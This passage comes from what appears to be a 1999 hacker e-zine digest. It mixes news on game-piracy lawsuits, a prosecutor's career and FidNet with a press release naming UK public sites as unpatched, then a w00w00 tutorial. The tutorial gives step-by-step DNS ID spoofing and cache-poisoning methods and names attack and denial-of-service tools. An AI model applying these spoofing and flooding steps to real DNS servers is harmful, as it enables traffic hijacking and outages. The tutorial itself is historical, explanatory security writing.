released Sarin nerve gas on the Tokyo subway in 1995.
Copyright (c) Post-Newsweek Business Information, Inc.
All rights reserved.
@HWA
29.0 Warez Groups Hit With Racketeering Charges
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Debris
Class, Paradigm, and Razor 1911 have been hit with a
federal racketeering suit filed by the Interactive Digital
Software Association, which is made up of six
independent publishers. The IDSA has brought a wide
range of charges against dozens of people across the
country including copyright and trademark piracy,
counterfeiting, and racketeering.
Wired
http://www.wired.com/news/news/buisness/story/21289.html
Game Makers Take Aim at Pirates
by Leander Kahney
12:45 p.m. 16.Aug.99.PDT
Game companies have filed federal racketeering suit against a nationwide ring of software
pirates who methodically distributed top games, sometimes even before they were commercially
available.
The Interactive Digital Software Association has banded together with six major game
publishers to file suit against three alleged pirate rings, known as Class, Paradigm, and Razor 1911.
"These are the most sophisticated hacker groups we've run across," said Doug Lowenstein, president
of the IDSA, a games industry trade group that helps investigate piracy. "They have tentacles that
stretch across the world."
According to Lowenstein, the three hacker groups involve hundreds of people worldwide and are capable
of churning out pirated software on an industrial scale. The suit recently filed in U.S. District Court
in San Francisco names dozens of individuals from across the United States.
At their height, the three groups turned out pirated copies of 100 of the most popular games every week,
Lowenstein said, costing the industry millions of dollars in lost revenues.
The groups are extremely well organized, capable of getting their hands on pre-production copies of
popular games, cracking them, and copying them to CD in a matter of days, Lowenstein said.
"These groups were responsible for a significant amount of games piracy," he said. "[This suit] won't be
the end of games piracy but it's a significant action in a long war."
The six publishers -- LucasArts Entertainment, Acclaim Entertainment, The 3DO Company, Infogrames,
Bethesda Softworks and Interplay Entertainment, joined the IDSA to file a wide range of charges, the most
serious of which include copyright and trademark piracy, counterfeiting, and racketeering.
According to the suit, the defendants operated out of San Francisco; Dallas; Minneapolis; Philadelphia;
Los Angeles; Buffalo, New York; Austin, Texas; and Champaign, Illinois.
Lowenstein declined to name defendants but said they had a significant number of associates overseas,
possibly hundreds.
The ISDA estimates worldwide piracy cost the U.S. games industry $3.2 billion in 1998.
@HWA
30.0 Public UK Sites Susceptible to Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by infowar
At DNSCon, held over the weekend in Blackpool England,
the public web sites of the Royal Mail and the Scottish
Executive where named as being vulnerable to attack.
Both sites were labeled as running unpatched versions
of Microsoft IIS4. Both sites have since been notified.
Con organizers claimed that this implied unacceptable
failures in management procedures under the Data
Protection Act. A call was also made at the con for a
national UK 'Infowar Hotline' to be established where
members of the public can safely report on weaknesses
in the UK's national Internet and Telecomms
infrastructure.
DNS Con
http://www.dnscon.org
DNS Con Press Release
http://www.hackernews.com/press/dnscon.html
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Public sector websites vulnerable to InfoWar attacks
"named and shamed" at Blackpool Conference.
In order to illustrate the need for a UK national InfoWar
reporting hotline, some public sector websites, belonging
to the Royal Mail and to the Scottish Executive were
publicly "named and shamed" as being vulnerable to
foreign InfoWar attackers.
This announcement was made at Secondary DNS, an
international Computer Security and Data Protection
conference which was held at the Norbreck Castle Hotel,
Blackpool, on Saturday 14th August 1999
website: http://www.dnscon.org
encrypted email: infowar@dnscon.org
A call was made for the establishment of a national UK
InfoWar Hotline, where patriotic members of the public
can safely "blow the whistle" on weaknesses in the UK's
national Internet and Telecomms infrastructure, 24 hours
a day, 365 days a year.
These weaknesses will eventually be exploited by
criminals, terrorists and other enemies of the UK,
damaging our reputation for excellence in information
technology, and tarnishing the trustworthiness of the UK
brand name in the era of e-commerce.
Both the Royal Mail
htpp://www.royalmail.co.uk
(and the alias http://www.viacode.co.uk)
as well as the Scottish Executive (formerly the Scottish
Office)
http://www.scotland.gov.uk
have all or part of their websites hosted on Microsoft IIS4
web servers, which have not had at least a year's worth
of freely available security patches applied to them. This
implies unacceptable failures in management procedures
under the Data Protection Act.
Consequently, it was possible for attackers, from
anywhere on the Internet, to compromise these systems
in a number of way e.g.
1) Denial of Service attacks (both Post Office and
Scottish Executive)
2) Compromise of confidential e-commerce information,
including names, addresses and credit card details of the
Post Office on-line stamps & envelopes customers
3) Compromise of confidential telegrams from friends and
families of our military forces in the Balkans sent to
BFPO-Kosovo (Post Office)
4) Damage to the trustworthiness of the ViaCode digital
certification authority brand name (Post Office).
Would you buy Digital Certificates or encryption services
from a ViaCode which, since its launch is March, cannot
seem to get its own webserver and instead uses the Royal
Mail server with a rival South African Thawte digital
certificate, rather than a ViaCode one ?
5) Issuance of fake Press releases from the official
Scottish Executive website resulting in political
embarrassment (re- shuffle the Scottish Cabinet ? )
and/or stock market manipulation ("leak" of Scottish
Budget details ?)
6) Installation of Trojan horse remote control software
such as netbus, to take complete control of these
webservers, possibly using them as a springboard for
further InfoWar attacks on the UK internet infrastructure
and other back office or internal systems within the Royal
Mail or the Scottish Executive.
Both the web sites were warned about the planned DNS
Conference announcement, with 48 hours warning by
email to their webmasters, followed up by special delivery
"snail mail" to their top management.
To date, only the Royal Mail has responded by fixing the
blatant security holes, and publishing a Security
Statement on their website
http://www.royalmail.co.uk/ISS.htm
The "process and technology to secure such systems and
data" have obviously failed. Serbian hackers, for example,
are unlikely to be deterred by threats of civil proceedings.
The senior management of the Royal Mail seems to think
that
"Microsoft patches have been applied to the website over
the last year although some have been omitted where
they are not required for our configuration."
Last Thursday 12th August is technically "over the last
year" but the wwww.royalmail.co.uk systems have been
vulnerable for months, so perhaps the senior management
are not getting the full picture from their subordinates.
"An external organisation has been contracted to test
security on our website ("penetration testing")."
Presumably this external organisation has only just been
hired, as it is inconceivable that a reputable one would
have missed the vulnerabilities mentioned above.
The Scottish Executive seems to have ignored both the
email and "snail mail" warnings, and their website still
remains vulnerable.
We strongly suggest that any news reports or press
releases published on the Sottish Executive website
should be independently verified via email, fax or phone.
We thank you for your attention
For further details, contact us by encrypted email:
infowar@dnscon.org or infowar@hushmail.com
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0.2i
iQA/AwUBN7kFuYOnRwzqxHsCEQLGgQCgxdAAfk
lsMt0cnLBQGh3kReSDAFsAoK1mTvtbQRhDQqb3
JXQNDO0C7Dss=QgcM
-----END PGP SIGNATURE-----
@HWA
31.0 Mitnick Prosecutor Moving to Private Practice
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Ted
After successfully prosecuting Kevin Poulsen, Ron
Austin, Justin Petersen, Lewis DePayne and Kevin
Mitnick, the federal prosecutor David Schindler will be
moving on to private practice. While none of his cyber
crime cases actually went to trail he did manage to get
guilty pleas from all of them.
LA Times
http://www.latimes.com/HOME/BUSINESS/CUTTING/lat_schindler990816.htm
Online Crime Fighter Signs Off
David Schindler Is Leaving U.S. Attorney's Office for Private Practice.
By GREG MILLER, Times Staff Writer
Kevin Mitnick wasn't the only prominent figure in the computer
hacking world closing out a major phase of his career last week.
David Schindler, one of Mitnick's prosecutors, was also making
something of a curtain call.
Mitnick was sentenced to 46 months in prison and ordered to pay
$4,125 to the companies he victimized. After the hearing, Schindler said
he is leaving the U.S. attorney's office after a 10-year stint during which he
won convictions of a list of defendants that reads like a hacking hall of fame.
Besides Mitnick, Schindler also prosecuted Kevin Poulsen, Ron Austin,
Justin Petersen and Lewis DePayne--more hackers than any other federal prosecutor
has faced.
Along the way, Schindler played a leading role in a number of major
white-collar crime cases, most notably winning a conviction of former
Arizona Gov. Fife Symington on bank fraud charges in 1997.
"I've had just a fabulous run in this office," Schindler said. "I've been
fortunate to have the greatest mix of cases I could ever have imagined."
Nevertheless, Schindler is leaving in October for a position as a
partner in the law firm Latham & Watkins, where he will be part of the
firm's vast intellectual property team and where his salary will easily exceed the
$115,000 a year he earned as a federal prosecutor.
During his years as an assistant U.S.attorney in Los Angeles, Schindler built a
reputation as an unflappable litigator--circumspect, forthright and
respected by even his adversaries.
"He is an exceptionally talented prosecutor," said Richard Sherman, who
represented DePayne and, for a short while, Mitnick. "In the Symington case,
he was fighting a well-financed political giant, and he acquitted himself
admirably."
There was a recent setback in the Symington case. A federal appeals court
overturned the conviction, ruling that the judge in the case improperly dismissed
one of the jurors. Schindler said the government has asked the appeals court
to reconsider.
At 37, Schindler is about the same age as the hackers he prosecuted, and
though he may not relish the thought, he has a few things in common with them.
Like most, he is a native Southern Californian, unusually disciplined in his
craft and with a head for the complexities of computer crime.
But unlike many hackers, Schindler was never particularly interested in
technology, was fairly popular in school and came from a stable family. His
father, now deceased, was a courtroom translator. His mother is an executive
with a music publishing company.
Schindler earned a degree in psychology from UC Berkeley, a law
degree at UCLA and joined the U.S. attorney's office in 1989. Over the
course of the next few years, Southern California became a hotbed of hacking
crimes, and Schindler handled the high-profile cases.
None of the cases ever went to trial.But he extracted guilty pleas from
Poulsen and Austin, who had rigged radio station call-in contests to win a pair
of Porsches; Petersen, who once illegally wired $150,000 from a bank; Mitnick,
who swiped source code from giant
technology companies; and DePayne, Mitnick's longtime accomplice.
With those cases behind him now, Schindler offered his thoughts on
those defendants.
Poulsen "really generates the most complicated feelings for me,"
Schindler said. "He was probably the brightest, and he had the ability to
create more harm. But I'm proud of him and the way he's turned his life
around."
After serving his five-year sentence, Poulsen has established a
budding career in journalism, writing stories for Wired magazine and
columns for ZDNet.com.
Austin was "an unfortunate follower," Schindler said. "I don't think
I've ever seen anybody as frightened as he was when he was arrested. It
was clear he was not cut out for a life of crime." Austin now works at a
computer store in West Los Angeles.
Petersen, a flamboyant hacker known for schmoozing minor
celebrities and porn stars, was behind some of Schindler's more
embarrassing moments. Petersen engaged in illegal hacking even while
working as a government informant. When Schindler confronted
Petersen about this at the federal courthouse, Petersen ducked out of
their meeting, ran down the courthouse steps and became a fugitive.
"What a piece of work," Schindler said. "I don't think I've ever met a
person in my life who has had so many aborted attempts at walking the
straight and narrow, someone whose own arrogance has caused h
im to
self-destruct so many times."
For his part, Petersen's occasional comments about Schindler are
mostly unprintable. Petersen was recently released after a probation
violation, and is now reportedly trying to start an Internet porn company.
Schindler seems to have the most contempt for Mitnick. He is a
"strange, in some senses pathetic, misguided human being," Schindler
said. "I don't hold a lot of confidence that he will turn his life around."
Of course, Mitnick would probably not be complimentary toward
Schindler either. The notoriously obsessive hacker, who is still in jail, has
long believed that he has been treated unfairly, and has even accused the
government of tampering with witnesses, a charge Schindler vehemently
denies.
Surprisingly, other hackers have a fairly charitable view of Schindler,
who is married and has a 1-year-old daughter.
"He was a very tough prosecutor," Austin said. "But looking at it in
retrospect, I think he was fair. When you compare him to everybody
else out there, he's head and shoulders above the rest."
Poulsen too holds Schindler in relatively high regard. In contrast to
other prosecutors, Schindler "charged [me] with crimes I actually
committed," Poulsen said. "It was refreshing. I'm not crazy about
prosecutors, but what more can you ask for?"
In his new job, Schindler will be handling trade secret thefts and
other work involving large companies. But he admits he may also be
called upon to do criminal work, meaning he could be defending the
kinds of people he once prosecuted.
"Could I be defending a Mitnick?" he asked, anticipating the
direction of the interview. "I won't be in that position. Most hackers
aren't able to afford private practice [defense attorneys]."
Times staff writer Greg Miller can be reached at
greg.miller@latimes.com.
Copyright Los Angeles Times
@HWA
32.0 NIPC Head Talks About FidNet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Richard Clarke, the National Coordinator for Security,
Infrastructure Protection and Counterterrorism, says
that the recent hysteria over the proposed FIDNet is
unwarranted. The proposal calls for the GSA to control
the IDS network and not the FBI as previously thought.
He said that once lawmakers actually read the proposal
and understand how it works opposition will fade away.
NY Times - registration required
http://www.nytimes.com/library/tech/99/08/biztech/articles/16monitor.html
August 16, 1999
Author of Computer Surveillance Plan
Tries to Ease Fears
By TIM WEINER
ASHINGTON -- Congress has blocked money for a planned
system to safeguard government computers, a prominent
Republican has denounced the system as "Orwellian" and some civil
libertarians are calling it a potential threat.
But the plan's author, a senior National Security Council official, says
those are only temporary setbacks to a critically needed system that will
be built if President Clinton wants it.
The proposed system, called Fidnet, is intended to protect government
computers from hackers, whether they be precocious teen-agers or
potential terrorists, administration officials say. It represents "the first
attempt by any nation to develop a plan to defend its cyberspace," a draft
plan by the security council says. The White House is seeking $1.5 billion
in new spending for the program.
Although Fidnet has been in the works for more
than a year, many in Congress learned about it
on July 28, when The New York Times
published details of the draft proposal.
The reaction was swift. Two days later, the
House Appropriations Committee deleted $2 million in start-up money
requested by the FBI to develop the system.
Then the House majority leader, Rep. Dick Armey, R-Texas, denounced
Fidnet, saying it raised "the Orwellian possibility that unscrupulous
government bureaucrats could one day use such a system to read our
personal e-mail."
But the principal author of the plan, Richard Clarke, the National
Security Council's counterterrorism czar, said Congress would assuredly
finance the system once lawmakers understood it and Clinton gave it the
go-ahead.
"If the president approves Fidnet, there'll be funding for it," he said in an
interview.
Clarke, whose formal title is National Coordinator for Security,
Infrastructure Protection and Counterterrorism, has been warning for
years about the threat of an "electronic Pearl Harbor" in the form of an
attack on government computers. He said that a cyberspace assault
would be "as bad as being attacked by bombs," and that "an attack on
American cyberspace is an attack on the United States" that should
trigger a military response.
These fears led last year to a new initiative,
called Presidential Decision Directive 63. Fidnet
is one of the first major computer-security
programs to grow out of the directive. It would
cover civilian agencies, like the State
Department and the IRS, and would be modeled on and linked to an
existing Pentagon security system. Ultimately, the plan calls for private
companies to create security links to the government's systems.
Clarke acknowledged that no one in Congress had been briefed on
Fidnet, which has not yet been given a go-ahead by President Clinton,
and that the draft plan had raised questions among civil libertarians who
say it has a potential power to monitor innocent citizens. But he said
Congress and the system's critics had the wrong idea about the planned
surveillance network.
The critics among the civil libertarians question the FBI's role in the
computer monitoring scheme. The bureau already has a centralized
security operation called the National Infrastructure Protection Center,
based in its headquarters, that has received technical support from the
National Security Agency, the intelligence service that eavesdrops on the
rest of the world, and from the CIA.
The New York Times reported that the Fidnet system, too, would be
overseen by the FBI. Clarke's draft plan calls for the National
Infrastructure Protection Center to play a role in analyzing and
responding to any signs of intrusion. But Clarke said in the interview that
while some funds requested for Fidnet were earmarked for the Justice
Department and the bureau, the system "would not be run by the FBI."
Instead, he said, it would be established by the General Services
Administration, an independent agency better known for furnishing
government offices than for law enforcement. "It would not be monitoring
privately owned and operated systems, only government computers,"
Clarke said. "And it would not violate people's privacy rights."
He conceded that failing to brief Congress was a mistake.
Because Congress already has a system to detect unauthorized intrusions
into its information systems, it should realize that "all that Fidnet would be
would be the same kind of thing for sensitive government computers,"
Clarke said.
"Congress has concerns about Justice being the funding source to pay for
intrusion detection mechanisms," he said. "That's a legitimate concern.
When they get the briefing they'll see there's a requirement to have
something like Fidnet."
@HWA
33.0 Spoofing revisited (w00w00)
~~~~~~~~~~~~~~~~~~~~~~~~~~~
DNS ID Hacking
--------------
Brought to you by:
Raw-Powa and w00w00 Security Development (WSD)
--[1]-- DNS ID Hacking Presentation
w00w00!
Hi. You might be wondering what DNS ID Hacking (or Spoofing) is.
DNS ID Hacking isn't the usual way of hacking/spoofing (such jizz
or any-erect). This method is based on a vulnerability on DNS Protocol.
This affects several DNS implementations (including WinNT's DNS and BIND,
for example).
--[1.1]-- DNS Protocol Mechanism
For the first step, you will need to know how the DNS works. We will only
explain the most important parts of this protocol. In order to do that, we
will follow the steps of a DNS request packet from A to Z!
1: The client (bla.bibi.com) sends a request of resolution from the domain
"www.heike.com". To resolve the name, bla.bibi.com uses "ns.bibi.com" for
DNS. Let's take a look at the following diagram:
/----------------------------------\
| 111.1.2.123 = bla.bibi.com |
| 111.1.2.222 = ns.bibi.com |
| format: |
| IP_ADDR:PORT->IP_ADDR:PORT |
| ex: |
| 111.1.2.123:2999->111.1.2.222:53 |
\----------------------------------/
...
gethostbyname("www.heike.com");
...
[bla.bibi.com] [ns.bibi.com]
111.1.2.123:1999 --->[?www.heike.com]------> 111.1.2.222:53
Here we see our resolution name request from source port 1999, requesting
the resolution from the DNS on port 53.
[note: The DNS is always on port 53]
Now that ns.bibi.com has received the resolution request from bla.bibi.com,
ns.bibi.com will have to resolve the name, let's look at it...
[ns.bibi.com] [ns.internic.net]
111.1.2.222:53 -------->[dns?www.heike.com]----> 198.41.0.4:53
ns.bibi.com asks ns.internic.net, which is the root name server, for the
address of www.heike.com, and if it doesn't have it and sends the request
to a name server which has authority over '.com' domains.
>>> it can have the NS record for heike.com, and not the A/CNAME for
>>> www.heike.com (this is the normal case). Also, you're not asking
>>> ns.internic.net, you're asking one of the root servers for
>>> COM directly.
[note: We ask to internic because it could have this request in its cache]
[ns.internic.net] [ns.bibi.com]
198.41.0.4:53 ------>[ns for.com is 144.44.44.4]------> 111.1.2.222:53
Here we can see that ns.internic.net answered to ns.bibi.com (which is the
NS that has authority over the domain bibi.com) with the name server
of for.com (which is the authority over '.com' domains), which has the
IP address 144.44.44.4 [let's call it ns.for.com]. Now our ns.bibi.com
will ask ns.for.com for the address of www.heike.com, but this one
doesn't have it, so it will forward the request to the DNS of heike.com
which has authority over heike.com as shown here:
[ns.bibi.com] [ns.for.com]
111.1.2.222:53 ------>[?www.heike.com]-----> 144.44.44.4:53
The answer from ns.for.com is:
[ns.for.com] [ns.bibi.com]
144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4]---> 144.44.44.4:53
Now that we know which IP address has authority on the domain "heike.com"
[we'll call it ns.heike.com], we ask it what the IP address of the machine
www (www.heike.com) is:
[ns.bibi.com] [ns.heike.com]
111.1.2.222:53 ----->[?www.heike.com]----> 31.33.7.4:53
And now at least, we have our answer:
[ns.heike.com] [ns.bibi.com]
31.33.7.4:53 ------->[www.heike.com == 31.33.7.44] ----> 111.1.2.222:53
We can now forward it to our client bla.bibi.com:
[ns.bibi.com] [bla.bibi.com]
111.1.2.222:53 ------->[www.heike.com == 31.33.7.44]----> 111.1.2.123:1999
Now bla.bibi.com knows the IP address of www.heike.com :)
So.. now let's imagine the opposite; that we'd like to have the name of a
machine from its IP address. In order to do that, the way to proceed will
be a little different because the IP address will have to be transformed:
Example:
100.20.40.3 will become 3.40.20.100.in-addr.arpa
Attention!! This method is only for the IP resolution request (reverse DNS)
So let's look at practical example when we take the IP of www.heike.com
(31.33.7.44 or "44.7.33.31.in-addr.arpa" after the translation into a
comprehensible format for the DNS).
...
gethostbyaddr("31.33.7.44");
...
We send our request to ns.bibi.com (our name server):
[bla.bibi.com] [ns.bibi.com]
111.1.2.123:2600 ----->[?44.7.33.31.in-addr.arpa]-----> 111.1.2.222:53
ns.bibi.com sends the request for the name of machine that is
44.7.33.31.in-addr.arpa to ns.internic.net:
[ns.bibi.com] [ns.internic.net]
111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 198.41.0.4:53
ns.internic.net will send the IP address of a name server which has
authority on '31.in-addr.arpa':
[ns.internic.net] [ns.bibi.com]
198.41.0.4:53 --> [NS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53
Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4:
[ns.bibi.com] [ns.for.com]
111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53
And so on...
In fact the mechanism is almost identical to the one used for name
resolution.
I hope you understood the dialog on how DNS works. Now let's study DNS
messages format.
--[1.2]-- DNS packet
Here is the format of a DNS message :
+---------------------------+---------------------------+
| ID (the famous :) | flags |
+---------------------------+---------------------------+
| numbers of questions | numbers of answer |
+---------------------------+---------------------------+
| number of RR authority |number of supplementary RR |
+---------------------------+---------------------------+
| |
\ \
\ QUESTION \
| |
+-------------------------------------------------------+
| |
\ \
\ ANSWER \
| |
+-------------------------------------------------------+
| |
\ \
\ Stuff etc.. No matter \
| |
+-------------------------------------------------------+
--[1.3]-- Structure of DNS packets.
__ID__
The ID is to identify each DNS packet, since exchanges between name
servers are from port 53 to port 53, and it receive more than one
>>> not necessarilly; DNS is allowed to bind any client port, and the
>>> DNS ID is also needed for asynchronous client resolvers (which
>>> might need to make more than one simultaneous query)
request at a time, so the ID is the only way to recognize the different DNS
requests. We'll talk about it a little more later..
__flags__
The flags area is divided into several parts:
4 bits 3 bits (always 0)
| |
| |
[QR | opcode | AA| TC| RD| RA | zero | rcode ]
|
| |__|__|__| |______ 4 bits
| |_ 1 bit
|
1 bit
QR = If the QR bit is 0, it means that the packet is a question,
otherwise it's an answer.
opcode = If the value is 0 for a normal request, 1 for a reserve request,
and 2 for a status request (we don't need to know all these modes).
AA = If it is equal to 1, it says that the name server has an
authoritative answer.
TC = This is unimportant.
RD = If this flag is to 1, it means "Recursion Request", for example
when bla.bibi.com asks ns.bibi.com to resolve the name, the flag
tells the DNS to assume this request.
RA = If this is set to 1, it means that recursion is available.
This bit is set to 1 in the answer of the name server if it
supports recursion.
Zero = Here are three zeroes...
rcode = It contains the error messages returned from DNS requests.
If 0, it means "no error", 3 means "name error"
The 2 following flags don't have any importance to us.
DNS QUESTION:
Here is the format of a DNS question :
+-----------------------------------------------------------------------+
| name of the question |
+-----------------------------------------------------------------------+
| type of question | type of query |
+--------------------------------+--------------------------------------+
The structure of the question is like this.
Example:
www.heike.com is [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]
This is always the same for an IP address.
This splits www.heike.com into three parts: "www", "heike", and "com". The
number in front of each part specifies the length. It is also terminated
by 0.
44.33.88.123.in-addr.arpa would be:
[2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0]
[note]: a compression format exists, but we won't use it.
type of question:
Here are the values that we will use most of the time:
[note]: There are more than 20 types of different values(!) and I'm fed
up with writing :))
name value
A | 1 | IP Address (for resolving a name to an IP)
PTR | 12 | Pointer (for resolving an IP to a name)
type of query:
The values are the same as the type of question's values (I'm not sure
it's true, but you should look through RFCs 1033-1035 and 1037).
DNS ANSWER:
The answers have a format that we call RR.
Here is the format of an answer (an RR):
+------------------------------------------------------------------------+
| name of the domain |
+------------------------------------------------------------------------+
| type | class |
+----------------------------------+-------------------------------------+
| TTL (time to live) |
+------------------------------------------------------------------------+
| resource data length | |
|----------------------------+ |
| resource data |
+-------------------------------------------------------------------------
name of the domain:
The domain name is stored in the same way that the question for the
resolution request of www.heike.com. The flag "name of the domain" will
contain: [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0].
type:
The type flag is the same than "type of query" in the question part of the
packet.
class:
The class flag is equal to 1 for Internet data.
time to live:
This flag explains in seconds the time-life of the informations into the
name server cache.
resource data length:
The length of resource data, for example if resource data length is 4, it
means that the data in resources data are 4 bytes long.
resource data:
here we put the IP for example (at least in our case)
As an example, this is what occurs when ns.bibi.com asks ns.heike.com for
www.heike.com's address:
ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53
+---------------------------------+--------------------------------------+
| ID = 1999 | QR = 0 opcode = 0 RD = 1 |
+---------------------------------+--------------------------------------+
| numbers of questions = htons(1) | numbers of answers = 0 |
+---------------------------------+--------------------------------------+
| number of RR authoritative = 0 | number of supplementary RR = 0 |
+---------------------------------+--------------------------------------+
<the question part>
+------------------------------------------------------------------------+
| name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+------------------------------------------------------------------------+
| type of question = htons(1) | type of query=htons(1) |
+---------------------------------+--------------------------------------+
Now let's look at the answer from ns.heike.com:
ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53
+---------------------------------+---------------------------------------+
| ID = 1999 | QR=1 opcode=0 RD=1 AA =1 RA=1 |
+---------------------------------+---------------------------------------+
| numbers of questions = htons(1) | numbers of answers = htons(1) |
+---------------------------------+---------------------------------------+
| number of RR authoritative = 0 | number of supplementary RR = 0 |
+---------------------------------+---------------------------------------+
+-------------------------------------------------------------------------+
| name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+-------------------------------------------------------------------------+
| type of question = htons(1) | type of query = htons(1) |
+-------------------------------------------------------------------------+
+-------------------------------------------------------------------------+
| name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+-------------------------------------------------------------------------+
| type = htons(1) | class = htons(1) |
+-------------------------------------------------------------------------+
| time to live = 999999 |
+-------------------------------------------------------------------------+
| resource data length = htons(4) | resource data=inet_addr("31.33.7.44") |
+-------------------------------------------------------------------------+
Yah! That's all for now :))
Here is an analysis:
In the answer QR = 1 because it's an answer :)
AA = 1 because the name server has authority in its domain
RA = 1 because recursion is available
I hope you understood that because you will need it for the following
events.
--[2.0]-- DNS ID hack/spoof
Now it's time to clearly explain what DNS ID hacking/spoofing is.
Like we explained before, the only way for the DNS to recognize the
different questions/answers is the ID flag in the packet. Look at this
example:
ns.bibi.com;53 ----->[?www.heike.com] ------> ns.heike.com:53
So you only have to spoof the ip of ns.heike.com and answer your false
information before ns.heike.com does first!
ns.bibi.com <------- . . . . . . . . . . . ns.heike.com
|
|<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com
But in practice you have to guess the good ID. If you are on a LAN, you
can sniff to get this ID and answer before the name server (it's easy on a
Local Network :)
If you want to do this remotely you don't have a lot a choices, but you
do have 4 basic methods:
1.) Randomly test all the possible values of the ID flag. You must answer
before the NS (ns.heike.com in this example)! This method is obsolete
unless you want to know the ID or any other favorable condition to
its prediction.
>>> This method is not obsolete --- it's how real attacks work. It
takes less than a minute on a DS1 to exhaustively search all the
ID's, and if you flood (or crash) the authority servers for the
resource record you're trying to inject, you have all the time
in the world to do it. This is the problem that the current DNS
protocol can't fix.
2.) Send some DNS requests (200 or 300) in order to increase the chances
of falling on the good ID.
>>> This is analogous to using 200 or 300 responses (both consume ID
space), except that naieve DNS servers might not detect 300 queries,
even if they do detect 300 wrong answers.
3.) Flood the DNS in order to avoid its work. The name server will crash
and show the following error!
>> Oct 06 05:18:12 w00w00 named[1913]: db_free: DB_F_ACTIVE set - ABORT
at this time named is out of order :)
4.) Or you can use the vulnerability in BIND discovered by SNI (Secure
Networks, Inc.) with ID prediction (we will discuss this in a bit).
##################### Windows ID Vulnerability ###########################
I haven't tested this on WinNT, but Windows ID's are extremely easy to
predict because it is '1' by default, and '2' for the second question (if
they are 2 questions at the same time).
######################## BIND Vulnerability ##############################
There is a vulnerability in BIND (discovered by SNI as stated earlier)
>>> we didn't discover this; it's old news. We released an advisory on
>>> how much easier it is to exploit than the old papers let on.
that we will be using. In fact, DNS IDs are easily predictable; you only
have to sniff a DNS in order to do what you want. Let me explain...
The DNS uses a random ID at the beginning but it only increases this ID
for the next question.
It's easy to exploit this vulnerability.
Here is the way:
1. Be able to sniff easily the messages that comes to a random DNS (ex.
ns.dede.com for this sample).
2. You ask NS.victim.com to resolve <whatever>.dede.com, and NS.victim.com
will ask ns.dede.com to resolve <random>.dede.com
ns.victim.com ---> [?<random>.dede.com ID = 444] ---> ns.dede.com
3. Now we have the ID of the message from NS.victim.com, now you know what
ID area you'll have to use. (ID = 444 in this sample).
4. You then make your resolution request. ex. www.microsoft.com to
NS.victim.com
(you) ---> [?www.microsoft.com] ---> ns.victim.com
ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com
5. Flood the name server ns.victim.com with the ID (444) you already have and
then you increase this by one.
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com
Now you know that DNS IDs are predictable, and they only increase. You
flood ns.victim.com with spoofed answers with the ID 444+ ;)
>>> That's not true on OpenBSD (random scoreboarded IDs).
[Note: WSDspoofID does this]
There is another way to exploit this vulnerability without a root on
any NS.
The mechanism is very simple. Here is the explanation:
We send to ns.victim.com a resolution request for *.provnet.fr
(you) ----------[?(random).provnet.fr] -------> ns.victim.com
Then, ns.victim.com asks ns1.provnet.fr to resolve <random>.provnet.fr.
There is nothing new here, but this is where the interesting part begins
here.
At this point you begin to flood ns.victim.com with spoofed answers
(with ns1.provnet.fr IP) with IDSs from 100 to 110:
(spoof) ----[<random>.provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com
(spoof) ----[<random>.provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com
(spoof) ----[<random>.provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com
(spoof) ----[<random>.provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com
...
After that, we ask ns.victim.com if <random>.provnet.fr has an IP address.
If ns.victim.com give us an IP address for <random>.provnet.fr then we
have found the correct! Otherwise, we have to repeat this attack until
we find the ID. It's a bit long but it's effective.
[Note: This is how WSD-IDpred works]
##########################################################################
Here you will find 5 programs
WSDkillDNS - very simple DNS spoofer
WSDsniffID - sniff a LAN and reply false DNS answers before the NS
WSDspoofID - a DNS ID spoofer (you'll need to be root on a NS)
WSD-IDpred - a DNS ID predictor (no need to be root on a NS)
WSD-baddns - a very simple denial of service attack to disable DNS
Note: You can find source and binaries of these programs at
ftp.w00w00.org/pub/DNS. You need to install libpcap on your machine before
any compilation of the w00w00 ID programs.
- w00w00 Security Development (WSD)
See http://www.w00w00.org and ftp://ftp.w00w00.org/pub
Thanks to: pirus, Heike, and all of w00w00 Security Development (WSD),
and Asriel.
Special Thanks to: ackboo and Secure Networks, Inc. (SNI) at
www.secnet.com for finding the vulnerability.
/* I'm a w00w00ify'd w00c0w */
Here is a HOWTO on the w00w00 ID tools:
----[HOWTO]----
I've decided to make a little HOWTO because the w00w00 ID tools are not
very user friendly for a beginner :)
1: WSD-baddns
